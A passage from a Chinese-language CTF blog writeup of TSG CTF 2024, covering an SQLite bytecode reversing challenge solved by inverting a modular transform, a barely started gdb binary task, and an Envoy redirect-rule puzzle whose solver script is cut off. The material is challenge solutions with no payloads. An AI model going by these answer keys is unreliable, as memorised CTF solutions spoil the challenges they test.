           00  Start at 12  </span><br><span class="line">1     Null           0     1     0                    00  r[1]=NULL    </span><br><span class="line">2     OpenWrite      0     2     0     3              00  root=2 iDb=0; tbl1</span><br><span class="line">3     Rewind         0     10    0                    00               </span><br><span class="line">4       Column         0     1     2                    00  r[2]=tbl1.two</span><br><span class="line">5       Ge             3     9     2     (BINARY)       51  if r[2]&gt;=r[3] goto 9</span><br><span class="line">6       Rowid          0     4     0                    00  r[4]=rowid   </span><br><span class="line">7       Once           0     8     0                    00               </span><br><span class="line">8       Delete         0     1     0     tbl1           02               </span><br><span class="line">9     Next           0     4     0                    01               </span><br><span class="line">10    Noop           0     0     0                    00               </span><br><span class="line">11    Halt           0     0     0                    00               </span><br><span class="line">12    Transaction    0     1     1     0              01  usesStmtJournal=0</span><br><span class="line">13    TableLock      0     2     1     tbl1           00  iDb=0 root=2 write=1</span><br><span class="line">14    Integer        20    3     0                    00  r[3]=20      </span><br><span class="line">15    Goto           0     1     0                    00</span><br></pre></td></tr></table></figure><p>所以dump应该是对db文件的转储，所以问题变成了，如何将 sqlite opcade 转换为可以阅读的常见指令类型（比如右侧comment）</p><blockquote><p>if SQLite is compiled with the <a href="https://www.sqlite.org/compile.html#enable_explain_comments">-DSQLITE_ENABLE_EXPLAIN_COMMENTS</a> options. (乐)</p></blockquote><p>难蚌</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241220005920304.png" alt="image-20241220005920304"></p><p>照着opcode一点一点写规则（？</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">opcode_to_description</span>(<span class="params">opcode, p1, p2, p3, p4, p5</span>):</span><br><span class="line">    descriptions = &#123;</span><br><span class="line">        <span class="number">0</span>: <span class="string">f&quot;Start at <span class="subst">&#123;p2&#125;</span>&quot;</span>,</span><br><span class="line">        <span class="number">1</span>: <span class="string">f&quot;R[<span class="subst">&#123;p1&#125;</span>] = <span class="subst">&#123;p3&#125;</span>&quot;</span>,</span><br><span class="line">......</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> descriptions.get(opcode, <span class="string">f&quot;Unknown opcode <span class="subst">&#123;opcode&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">process_opcode_dump</span>(<span class="params">dump_file_path</span>):</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(dump_file_path, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">        <span class="keyword">for</span> line <span class="keyword">in</span> file:</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;|&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> line:</span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line">            parts = line.strip().split(<span class="string">&#x27;|&#x27;</span>)</span><br><span class="line">            <span class="keyword">if</span> <span class="built_in">len</span>(parts) &gt;= <span class="number">4</span>:</span><br><span class="line">                opcode = <span class="built_in">int</span>(parts[<span class="number">0</span>])  </span><br><span class="line">                p1 = <span class="built_in">int</span>(parts[<span class="number">2</span>])     </span><br><span class="line">                p2 = <span class="built_in">int</span>(parts[<span class="number">3</span>])     </span><br><span class="line">                p3 = <span class="built_in">int</span>(parts[<span class="number">4</span>])      </span><br><span class="line">                p4 = <span class="built_in">str</span>(parts[<span class="number">5</span>])</span><br><span class="line">                p5 = <span class="built_in">int</span>(parts[<span class="number">6</span>])</span><br><span class="line">                description = opcode_to_description(opcode, p1, p2, p3, p4, p5)</span><br><span class="line">                <span class="built_in">print</span>(description)</span><br><span class="line"></span><br><span class="line">process_opcode_dump(<span class="string">&#x27;./dump&#x27;</span>)</span><br></pre></td></tr></table></figure><p>一点一点扣规则（？</p><p>最后的integer似乎是寄存器？找一些操作行为，比如Ge、add、Multiply</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">57|Multiply|30|29|24||0</span><br><span class="line">58|Add|31|24|20||0</span><br><span class="line">59|Remainder|32|20|21||0</span><br><span class="line">89|Integer|1|15|0||0</span><br><span class="line">90|Integer|1|16|0||0</span><br><span class="line">91|Integer|2|18|0||0</span><br><span class="line">92|Integer|1|19|0||0</span><br><span class="line">93|Integer|10|28|0||0</span><br><span class="line">94|Integer|7|30|0||0</span><br><span class="line">95|Integer|2|31|0||0</span><br><span class="line">96|Integer|256|32|0||0</span><br></pre></td></tr></table></figure><p>根据寄存器的内容读取第 55 条到第 66 条指令时，循环了 10 次计算 ((something * 7) + 2) % 256</p><p>本想着直接爆破来着（x 下面是一个数学方法，</p><h3 id="一些别的"><a href="#一些别的" class="headerlink" title="一些别的"></a>一些别的</h3><p><a href="https://github.com/moratorium08/ctf_writeups/blob/master/2024/tsgctf/README.md">ctf_writeups&#x2F;2024&#x2F;tsgctf&#x2F;README.md at master · moratorium08&#x2F;ctf_writeups</a></p><p>这个师傅SQL恢复的非常好：</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">WITH</span> <span class="keyword">RECURSIVE</span></span><br><span class="line">split(input, rest, idx) <span class="keyword">AS</span> (</span><br><span class="line">    <span class="keyword">VALUES</span>(<span class="string">&#x27;&#x27;</span>, ?, <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">UNION</span> <span class="keyword">ALL</span></span><br><span class="line">    <span class="keyword">SELECT</span></span><br><span class="line">        substr(rest, <span class="number">1</span>, <span class="number">1</span>),</span><br><span class="line">        substr(rest, <span class="number">2</span>),</span><br><span class="line">        idx <span class="operator">+</span> <span class="number">1</span></span><br><span class="line">    <span class="keyword">FROM</span> split</span><br><span class="line">    <span class="keyword">WHERE</span> rest <span class="operator">&lt;&gt;</span> <span class="string">&#x27;&#x27;</span></span><br><span class="line">),</span><br><span class="line">tr(val, idx, iter) <span class="keyword">AS</span> (</span><br><span class="line">    <span class="keyword">SELECT</span></span><br><span class="line">        unicode(input) <span class="keyword">AS</span> val,</span><br><span class="line">        idx,</span><br><span class="line">        <span class="number">0</span> <span class="keyword">AS</span> iter</span><br><span class="line">    <span class="keyword">FROM</span> split</span><br><span class="line">    <span class="keyword">WHERE</span> input <span class="operator">&lt;&gt;</span> <span class="string">&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">UNION</span> <span class="keyword">ALL</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">SELECT</span></span><br><span class="line">        (tr.val <span class="operator">*</span> <span class="number">7</span> <span class="operator">+</span> <span class="number">2</span>) <span class="operator">%</span> <span class="number">256</span>,</span><br><span class="line">        idx,</span><br><span class="line">        iter <span class="operator">+</span> <span class="number">1</span></span><br><span class="line">    <span class="keyword">FROM</span> tr</span><br><span class="line">    <span class="keyword">WHERE</span> iter <span class="operator">&lt;</span> <span class="number">10</span></span><br><span class="line">)</span><br><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">from</span> tr <span class="keyword">WHERE</span> iter <span class="operator">=</span> <span class="number">10</span> <span class="keyword">ORDER</span> <span class="keyword">BY</span> idx;</span><br></pre></td></tr></table></figure><p>exp：（很好的数论，让我的大脑短路）# 唉，乘法逆元。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sqlite3</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">res = [<span class="number">100</span>, <span class="number">115</span>, <span class="number">39</span>, <span class="number">99</span>, <span class="number">100</span>, <span class="number">54</span>, <span class="number">27</span>, <span class="number">115</span>, <span class="number">69</span>, <span class="number">220</span>, <span class="number">69</span>, <span class="number">99</span>, <span class="number">100</span>, <span class="number">191</span>, <span class="number">56</span>, <span class="number">161</span>, <span class="number">131</span>, <span class="number">11</span>, <span class="number">101</span>, <span class="number">162</span>, <span class="number">191</span>, <span class="number">54</span>, <span class="number">130</span>, <span class="number">175</span>, <span class="number">205</span>, <span class="number">191</span>, <span class="number">222</span>, <span class="number">101</span>, <span class="number">162</span>, <span class="number">116</span>, <span class="number">147</span>, <span class="number">191</span>, <span class="number">55</span>, <span class="number">24</span>, <span class="number">69</span>, <span class="number">130</span>, <span class="number">69</span>, <span class="number">191</span>, <span class="number">252</span>, <span class="number">101</span>, <span class="number">102</span>, <span class="number">101</span>, <span class="number">252</span>, <span class="number">189</span>, <span class="number">82</span>, <span class="number">116</span>, <span class="number">41</span>, <span class="number">147</span>, <span class="number">161</span>, <span class="number">147</span>, <span class="number">132</span>, <span class="number">101</span>, <span class="number">162</span>, <span class="number">82</span>, <span class="number">191</span>, <span class="number">220</span>, <span class="number">9</span>, <span class="number">205</span>, <span class="number">9</span>, <span class="number">100</span>, <span class="number">191</span>, <span class="number">38</span>, <span class="number">68</span>, <span class="number">253</span>]</span><br><span class="line"></span><br><span class="line">n = <span class="built_in">pow</span>(<span class="number">7</span>, -<span class="number">1</span>, <span class="number">256</span>)  <span class="comment"># &lt;----这里</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    numbers = []</span><br><span class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> res:</span><br><span class="line">        m = ((x - <span class="number">2</span>) * n) % <span class="number">256</span></span><br><span class="line">        numbers.append(m)</span><br><span class="line">    res = numbers</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;&#x27;</span>.join(<span class="built_in">map</span>(<span class="built_in">chr</span>, res)))</span><br></pre></td></tr></table></figure><h2 id="TSGDBinary"><a href="#TSGDBinary" class="headerlink" title="TSGDBinary"></a>TSGDBinary</h2><h3 id="题目分类-1"><a href="#题目分类-1" class="headerlink" title="题目分类"></a>题目分类</h3><p>&lt; ？ &gt;</p><h3 id="题目信息-1"><a href="#题目信息-1" class="headerlink" title="题目信息"></a>题目信息</h3><blockquote><p>Author: iwashiira </p><p>Everyday Tools</p><p> <a href="https://score.ctf.tsg.ne.jp/files/2a0040ca6d660d6ccead3847707951a3/TSGDBinary.tar.gz?token=eyJ1c2VyX2lkIjoxNCwidGVhbV9pZCI6MTAsImZpbGVfaWQiOjZ9.Z11m2w.gpLXkEcd8H0jrms3dSF_SGxGTAI">TSGDBinary.tar.gz</a></p></blockquote><p>三个文件，start.sh:</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo gdb --nx -x ./tsgdbinary.py ./tsgdbinary</span><br></pre></td></tr></table></figure><p>执行 tsgdbinary 二进制文件，同时将 tsgdbinary.py 作为 GDB 脚本加载</p><p>。。哭了</p><p>不想看了。先做点作业吧。</p><h2 id="serverless"><a href="#serverless" class="headerlink" title="serverless"></a>serverless</h2><p><strong>&lt;\yaml&gt;&lt;重定向&gt;</strong></p><h3 id="题目分类-2"><a href="#题目分类-2" class="headerlink" title="题目分类"></a>题目分类</h3><h3 id="题目信息-2"><a href="#题目信息-2" class="headerlink" title="题目信息"></a>题目信息</h3><blockquote><p>Author: mikit </p><p>Experience the power of serverless computing. </p><p>The server is provided for illustration purposes only and there is no need to connect to the server to solve this task. </p><p><a href="http://34.146.145.253:20906/TSGCTF%7Bdummy_dummy%7D">http://34.146.145.253:20906/TSGCTF{dummy_dummy}</a></p><p><a href="https://score.ctf.tsg.ne.jp/files/54bca6b0517a33ac438482eb979e913a/serverless.tar.gz?token=eyJ1c2VyX2lkIjoxNCwidGVhbV9pZCI6MTAsImZpbGVfaWQiOjI1fQ.Z12CPw.Ow8xLaLOIDHfHjhTH46uvFnS7VU">serverless.tar.gz</a></p></blockquote><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241223222322354.png" alt="image-20241223222322354"></p><h3 id="题目分析-1"><a href="#题目分析-1" class="headerlink" title="题目分析"></a>题目分析</h3><p>不太懂是什么，可以看到后面都是格式相同的内容，把前面扔个chatGPT：写了一些注释：</p><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># docker-compose配置文件</span></span><br><span class="line"><span class="attr">services:</span></span><br><span class="line">  <span class="attr">proxy:</span></span><br><span class="line">    <span class="attr">image:</span> <span class="string">envoyproxy/envoy:v1.31.4</span></span><br><span class="line">    <span class="attr">restart:</span> <span class="literal">no</span></span><br><span class="line">    <span class="attr">command:</span> [<span class="string">&quot;--log-level info&quot;</span>, <span class="string">&quot;--config-path /etc/envoy/envoy.yaml&quot;</span>]</span><br><span class="line">    <span class="attr">ports:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">&quot;20906:20906&quot;</span> <span class="comment"># 将容器的 20906 端口映射到主机的 20906 端口。</span></span><br><span class="line">    <span class="attr">configs:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">source:</span> <span class="string">proxy.yaml</span></span><br><span class="line">        <span class="attr">target:</span> <span class="string">/etc/envoy/envoy.yaml</span></span><br><span class="line"><span class="attr">configs:</span></span><br><span class="line">  <span class="comment">#嵌套在这里</span></span><br><span class="line">  <span class="attr">proxy.yaml:</span></span><br><span class="line">    <span class="attr">content:</span> <span class="string">|</span></span><br><span class="line"><span class="string">      admin:</span></span><br><span class="line"><span class="string">        address:</span></span><br><span class="line"><span class="string">          socket_address: &#123; address: 127.0.0.1, port_value: 0 &#125;</span></span><br><span class="line"><span class="string">      static_resources: </span></span><br><span class="line"><span class="string">        clusters:</span></span><br><span class="line"><span class="string">        - name: redirect-cluster</span></span><br><span class="line"><span class="string">          connect_timeout: 0.1s #超时</span></span><br><span class="line"><span class="string">          type: STATIC # 静态负载均衡</span></span><br><span class="line"><span class="string">          lb_policy: ROUND_ROBIN #负载均衡算法</span></span><br><span class="line"><span class="string">          load_assignment: #配置和 redirect-cluster 相似，但是地址为 127.0.0.1:20908</span></span><br><span class="line"><span class="string">            cluster_name: redirect-cluster</span></span><br><span class="line"><span class="string">            endpoints:</span></span><br><span class="line"><span class="string">            - lb_endpoints:</span></span><br><span class="line"><span class="string">              - endpoint:</span></span><br><span class="line"><span class="string">                  address:</span></span><br><span class="line"><span class="string">                    socket_address:</span></span><br><span class="line"><span class="string">                      address: 127.0.0.1</span></span><br><span class="line"><span class="string">                      port_value: 20907</span></span><br><span class="line"><span class="string">        - name: internal-cluster</span></span><br><span class="line"><span class="string">          connect_timeout: 0.1s</span></span><br><span class="line"><span class="string">          type: STATIC</span></span><br><span class="line"><span class="string">          lb_policy: ROUND_ROBIN</span></span><br><span class="line"><span class="string">          load_assignment:</span></span><br><span class="line"><span class="string">            cluster_name: internal-cluster</span></span><br><span class="line"><span class="string">            endpoints:</span></span><br><span class="line"><span class="string">            - lb_endpoints:</span></span><br><span class="line"><span class="string">              - endpoint:</span></span><br><span class="line"><span class="string">                  address:</span></span><br><span class="line"><span class="string">                    socket_address:</span></span><br><span class="line"><span class="string">                      address: 127.0.0.1</span></span><br><span class="line"><span class="string">                      port_value: 20908</span></span><br><span class="line"><span class="string">        listeners:</span></span><br><span class="line"><span class="string">        - name: api-listener</span></span><br><span class="line"><span class="string">          address:</span></span><br><span class="line"><span class="string">            socket_address: &#123; address: 0.0.0.0, port_value: 20906 &#125;</span></span><br><span class="line"><span class="string">          # 配置了一个 HTTP 连接管理器过滤器，route_config 定义了具体的路由规则：</span></span><br><span class="line"><span class="string">          filter_chains:</span></span><br><span class="line"><span class="string">          - filters:</span></span><br><span class="line"><span class="string">            - name: envoy.filters.network.http_connection_manager</span></span><br><span class="line"><span class="string">              typed_config:</span></span><br><span class="line"><span class="string">                &quot;@type&quot;: type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager</span></span><br><span class="line"><span class="string">                stat_prefix: ingress_http</span></span><br><span class="line"><span class="string">                codec_type: AUTO</span></span><br><span class="line"><span class="string">                route_config: &lt;------这里</span></span><br><span class="line"><span class="string">                  name: local_route</span></span><br><span class="line"><span class="string">                  virtual_hosts:</span></span><br><span class="line"><span class="string">                  - name: local_service</span></span><br><span class="line"><span class="string">                    domains: [&quot;*&quot;]</span></span><br><span class="line"><span class="string">                    routes:</span></span><br><span class="line"><span class="string">                    - match:</span></span><br><span class="line"><span class="string">                        # please decode `%7B` to `&#123;` and `%7D` to `&#125;` before submission.</span></span><br><span class="line"><span class="string">                        safe_regex: &#123; regex: &quot;^/TSGCTF%7B[a-zA-Z0-9_-]+%7D/?$&quot; &#125;</span></span><br><span class="line"><span class="string">                      route:</span></span><br><span class="line"><span class="string">                        cluster: redirect-cluster</span></span><br><span class="line"><span class="string">                        timeout: 1s</span></span><br><span class="line"><span class="string">                        internal_redirect_action: HANDLE_INTERNAL_REDIRECT</span></span><br><span class="line"><span class="string">                    - match:  &lt;-----匹配成功</span></span><br><span class="line"><span class="string">                        prefix: &quot;/&quot;</span></span><br><span class="line"><span class="string">                      direct_response:</span></span><br><span class="line"><span class="string">                        status: 200</span></span><br><span class="line"><span class="string">                        body:</span></span><br><span class="line"><span class="string">                          inline_string: &quot;ill-formed&quot;  </span></span><br><span class="line"><span class="string">                http_filters:</span></span><br><span class="line"><span class="string">                - name: envoy.filters.http.router</span></span><br><span class="line"><span class="string">                  typed_config:</span></span><br><span class="line"><span class="string">                    &quot;@type&quot;: type.googleapis.com/envoy.extensions.filters.http.router.v3.Router</span></span><br><span class="line"><span class="string">        - name: redirect-listener</span></span><br><span class="line"><span class="string">          address:</span></span><br><span class="line"><span class="string">            socket_address: &#123; address: 127.0.0.1, port_value: 20907 &#125;</span></span><br><span class="line"><span class="string">          filter_chains:</span></span><br><span class="line"><span class="string">          - filters:</span></span><br><span class="line"><span class="string">            - name: envoy.filters.network.http_connection_manager</span></span><br><span class="line"><span class="string">              typed_config:</span></span><br><span class="line"><span class="string">                &quot;@type&quot;: type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager</span></span><br><span class="line"><span class="string">                stat_prefix: ingress_http</span></span><br><span class="line"><span class="string">                codec_type: AUTO</span></span><br><span class="line"><span class="string">                route_config:</span></span><br><span class="line"><span class="string">                  name: local_route</span></span><br><span class="line"><span class="string">                  virtual_hosts:</span></span><br><span class="line"><span class="string">                  - name: local_service</span></span><br><span class="line"><span class="string">                    domains: [&quot;*&quot;]</span></span><br><span class="line"><span class="string">                    routes:</span></span><br><span class="line"><span class="string">                    - match:</span></span><br><span class="line"><span class="string">                        prefix: &quot;/&quot;</span></span><br><span class="line"><span class="string">                      route:</span></span><br><span class="line"><span class="string">                        cluster: internal-cluster</span></span><br><span class="line"><span class="string">                        internal_redirect_policy:</span></span><br><span class="line"><span class="string">                          max_internal_redirects: 2000</span></span><br><span class="line"><span class="string">                          redirect_response_codes: [301]</span></span><br><span class="line"><span class="string">                http_filters:</span></span><br><span class="line"><span class="string">                - name: envoy.filters.http.router</span></span><br><span class="line"><span class="string">                  typed_config:</span></span><br><span class="line"><span class="string">                    &quot;@type&quot;: type.googleapis.com/envoy.extensions.filters.http.router.v3.Router</span></span><br><span class="line"><span class="string">        - name: internal-listener</span></span><br><span class="line"><span class="string">          address:</span></span><br><span class="line"><span class="string">            socket_address: &#123; address: 0.0.0.0, port_value: 20908 &#125;</span></span><br><span class="line"><span class="string">          filter_chains:</span></span><br><span class="line"><span class="string">          - filters:</span></span><br><span class="line"><span class="string">            - name: envoy.filters.network.http_connection_manager</span></span><br><span class="line"><span class="string">              typed_config:</span></span><br><span class="line"><span class="string">                &quot;@type&quot;: type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager</span></span><br><span class="line"><span class="string">                stat_prefix: ingress_http</span></span><br><span class="line"><span class="string">                codec_type: AUTO</span></span><br><span class="line"><span class="string">                http_filters:</span></span><br><span class="line"><span class="string">                - name: envoy.filters.http.router</span></span><br><span class="line"><span class="string">                  typed_config:</span></span><br><span class="line"><span class="string">                    &quot;@type&quot;: type.googleapis.com/envoy.extensions.filters.http.router.v3.Router</span></span><br><span class="line"><span class="string">                route_config:</span></span><br><span class="line"><span class="string">                  name: local_route</span></span><br><span class="line"><span class="string">                  virtual_hosts:</span></span><br><span class="line"><span class="string">                  - name: local_service</span></span><br><span class="line"><span class="string">                    domains: [&quot;*&quot;]</span></span><br><span class="line"><span class="string">                    routes:</span></span><br><span class="line"><span class="string">                    - match:</span></span><br><span class="line"><span class="string">                        path: &quot;/&quot;</span></span><br><span class="line"><span class="string">                      direct_response:</span></span><br><span class="line"><span class="string">                        status: 200</span></span><br><span class="line"><span class="string">                        body:</span></span><br><span class="line"><span class="string">                          inline_string: &quot;ok&quot;</span></span><br><span class="line"><span class="string">                    # 对于匹配正则表达式 ^(.*)/eq.* 的路径，进行重定向，重写路径将 &quot;/eq&quot; 替换为 &quot;(w)(s)(p)/&quot;</span></span><br><span class="line"><span class="string">                    - match:</span></span><br><span class="line"><span class="string">                        safe_regex: &#123; regex: &quot;^(.*)/eq.*&quot; &#125;</span></span><br><span class="line"><span class="string">                      redirect:</span></span><br><span class="line"><span class="string">                        regex_rewrite:</span></span><br><span class="line"><span class="string">                          pattern: &#123; regex: &quot;^(.*)/eq&quot; &#125;</span></span><br><span class="line"><span class="string">                          substitution: &quot;\\1(w)(s)(p)/&quot;</span></span><br><span class="line"><span class="string">                    - match:</span></span><br><span class="line"><span class="string">                    ······很多个类似的结构（六行）直到结尾</span></span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241224153053086.png" alt="image-20241224153053086"></p><p>将六行匹配，写为一行的键值对，发现有以下规则：</p><blockquote><ul><li>标志开头的 TSGCTF{ 中的开头括号 %7B 被转换为（&#x2F; 和 “开头圆括号 + 斜线”。</li><li>标志末尾 } 的结尾括号 %7D 被转换为 a) 和结尾圆括号。</li><li>将 ) 转换为 ) 和结尾圆括号。 换句话说，去掉斜线。</li><li>将 _ 转换为)(&#x2F;和 “闭合圆括号 + 开头圆括号 + 斜线”。</li><li>将 “斜线 + 1 或 2 个小写字母或数字或连字符”（如 &#x2F;eq）转换为 “圆括号内的 3 个小写字母 + 斜线”（如 (w)(s)(p)&#x2F;）。</li><li>将 “斜线 + 1 或 2 个小写字母、数字或连字符”（如 &#x2F;6i）转换为 “3 个小写字母（用圆括号包围） + 3 个大写字母 + 斜线”（如 (s)(y)(n)RZK&#x2F;）。</li><li>将 “斜线 + 1 或 2 个小写字母或数字或连字符”，如 &#x2F;wz&#x2F; 转换为 “1 个小写字母 + 3 个大写字母 + 斜线”，如 cDPL&#x2F;。</li><li>将 “大写字母 + 圆括号内的小写字母”（如 M(m)）转换为空字符串。 这种组合适用于从 A 到 Z 的所有 26 个字母。</li><li>(有些模式会将 %7D%7B 转换为 +。 但这种情况不会发生）。</li></ul><p>对所有模式的分析表明，斜线的位置在模式中非常重要。</p><ul><li>斜线由大括号和下划线产生。</li><li>&#x2F;eq 等模式在转换字符串（例如<br>&#x2F;），并在斜线到达结尾圆括号时清除斜线。</li><li>目标是重定向的结果是&#x2F;。 为此，必须删除 TSGCTF 字符串。 考虑到可以删除的模式，TSGCTF(f)(t)(c)(g)(s)(t) 模式显然需要完成。</li></ul><p>换句话说，对于字母 tsfctf，我们需要找到满足以下重定向的模式：。</p><ul><li>第一个重定向目标是 tABC&#x2F; 格式中的 “1 个小写字母 + 3 个大写字母 + 斜线 ”模式</li><li>中间重定向目的地是(c)(b)(a)XYZ&#x2F;格式的 “3 个小写字母括在圆括号中，抵消前面的 3 个大写字母 + 另外 3 个大写字母 + 斜线 ”模式的零次或多次重复。</li><li>最后一个重定向是(z)(y)(x)&#x2F;，即 “3 个小写字母括在圆括号中，取消前面的 3 个大写字母 + 一条斜线”。</li></ul></blockquote><p>&#x2F;をかお えすあ  &lt;–读出来就知道是哪个表情包了）</p><p>。为什么我这么菜啊我靠啊</p><p>。。</p><p>贴一个csome师傅的exp.py:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span 